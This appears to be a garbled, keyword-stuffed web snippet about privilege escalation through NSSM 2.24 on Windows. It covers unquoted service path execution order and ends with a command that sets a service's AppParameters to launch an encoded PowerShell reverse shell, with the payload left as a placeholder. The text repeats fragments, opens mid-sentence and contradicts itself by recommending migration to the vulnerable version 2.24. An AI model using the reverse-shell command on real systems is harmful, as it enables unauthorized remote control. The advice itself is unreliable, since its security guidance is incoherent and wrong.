Nssm-2.24 Privilege Escalation Upd
However, (released several years ago) contains a specific, reproducible privilege escalation vulnerability that has flown under the radar for many organizations. While the maintainers have since addressed this in later versions, countless legacy systems and poorly maintained servers still run NSSM 2.24.
: If a service path is C:\Program Files\Service\nssm.exe , Windows will attempt to execute files in this order: C:\Program.exe C:\Program Files\Service.exe C:\Program Files\Service\nssm.exe nssm-2.24 privilege escalation
If you must use NSSM, migrate to version 2.24 . Better yet, use a maintained alternative like WinSW with XML configuration files that support integrity checks. However, (released several years ago) contains a specific,
nssm set LegacyApp AppParameters "C:\Windows\System32\cmd.exe /c powershell -enc <base64 reverse shell>" base64 reverse shell>